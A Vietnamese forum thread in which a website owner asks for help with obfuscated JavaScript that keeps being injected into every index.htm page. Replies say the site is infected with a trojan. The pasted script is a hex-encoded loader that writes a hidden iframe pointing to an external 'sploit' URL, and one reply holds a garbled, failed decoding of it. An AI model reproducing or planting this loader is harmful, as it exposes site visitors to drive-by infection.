Trang Web của mình , Host và domain xịn , dùng được một thời gian rồi, vài hôm nay mình phái hiện ra tất cả
nhưng trang index.htm của mình đều bị tự động gài một đoạn mã có nội dung như sau :

<script>function vxxYadbVYxx(vbbxVaxxVVy){ return(parseInt(vbbxVaxxVVy,16));}function vbxyaVVddxa
(vybaVyadVyd){ var vbabxdtdaxb='';for(vxbbtbyytby=0; vxbbtbyytby<vybaVyadVyd.length;
vxbbtbyytby+=2){vbabxdtdaxb+=(String.fromCharCode( vxxYadbVYxx(vybaVyadVyd.substr
(vxbbtbyytby,2))));}return
vbabxdtdaxb;} document.write(vbxyaVVddxa('3C5343524950543E77696E 646F772E7374617475733D27446F
6E65273B646F63756D656E742E777269
746528273C696672616D65202069643D226464797874797456 646222206E616D653D227862797462
78615678
7922207372633D22687474703A2F2F7265646469692E72752F 747261666669632F73706C6F697431
2F
3F272B4D6174682E726F756E64284D6174682E72616E646F6D 28292A343130373530292B27787478
567
46262746179222077696474683D22373735222068656967687 43D2235333022207374796C653D226
4
6973706C61793A206E6F6E653B223E3C2F696672616D653E27 293C2F5343524950543E'));</scripts>

Mình xóa nó đi rất nhiều lần, nhưng cứ khoảng 12h - 24h là nó lại xuất hiện một cách tự động trên tất cả các trang index.htm .
(Host , domain mình mua ở Pavietnam ). Trang Web của mình có phải đang bị @hắc ? người khác biết pass admin ? ........

ai biết , hoặc từng gặp vấn đề này giúp mình với .

à ! bạn nào có thể giải đoạn mã trên để xem nó viết gì không post lên cho minh xem với nhé

cảm ơn rất nhiều

Bạn duyệt vào site của bạn có hiện POPUP và cảnh báo Virus từ ANTI đúng không? Có lẽ có một chương trình đã tự động thay đổi nội dung file của bạn sau một khoảng thời gian nhất định rồi. Nên sửa cũng vô ích thôi, phải xem chương trình đó nằm ở đâu trên server mà tống khứ nó đi.

Sao KAV không detect đoạn script trên nhỉ. Hay bạn post sai đoạn mã???

đoạn mã đây xem hộ mình với

<script>function vxxYadbVYxx(vbbxVaxxVVy){ return(parseInt(vbbxVaxxVVy,16));}function vbxyaVVddxa(vybaVyadVyd){ var vbabxdtdaxb='';for(vxbbtbyytby=0; vxbbtbyytby<vybaVyadVyd.length; vxbbtbyytby+=2){vbabxdtdaxb+=(String.fromCharCode( vxxYadbVYxx(vybaVyadVyd.substr(vxbbtbyytby,2))));} return vbabxdtdaxb;} document.write(vbxyaVVddxa('3C5343524950543E77696E 646F772E7374617475733D27446F6E65273B646F63756D656E 742E777269746528273C696672616D65202069643D22646479 7874797456646222206E616D653D2278627974627861567879 22207372633D22687474703A2F2F7265646469692E72752F74 7261666669632F73706C6F6974312F3F272B4D6174682E726F 756E64284D6174682E72616E646F6D28292A34313037353029 2B2778747856746262746179222077696474683D2237373522 206865696768743D2235333022207374796C653D2264697370 6C61793A206E6F6E653B223E3C2F696672616D653E27293C2F 5343524950543E'));</script>

Bạn đã bị nhiểm Trojan rồi.
http://i443.photobucket.com/albums/qq158/dinhanhency/detect.jpg

mình không hiểu lắm, bạn giải thích rõ cho mình được không, và cách loạn trừ nó nưa !

<SCRIPT>winF÷rç7FGW3ÒtFöæRs¶Fö7VÖVçBçw&—FR‚sƖg&ÖR–CÒ&FG—‡G—Edb" name="xbytbxaVxy" src="http://reddii.ru/ G&ff–2÷7Æö—Cóòr´ÖF‚ç&÷VæB„ÖF‚ç&æFö
()*410750)+'xtxVtbbtay" width="775" heigh CÒ#S3" 7G–ÆSÒ&F—7Æ“¢æöæS²#ãÂö–g&ÖSâ )</SCRIPT>

[=========> Bổ sung bài viết <=========]

sao mình thử giải mã bằng FrontPage thì nó ra những mã lằng nhằng thế nhỉ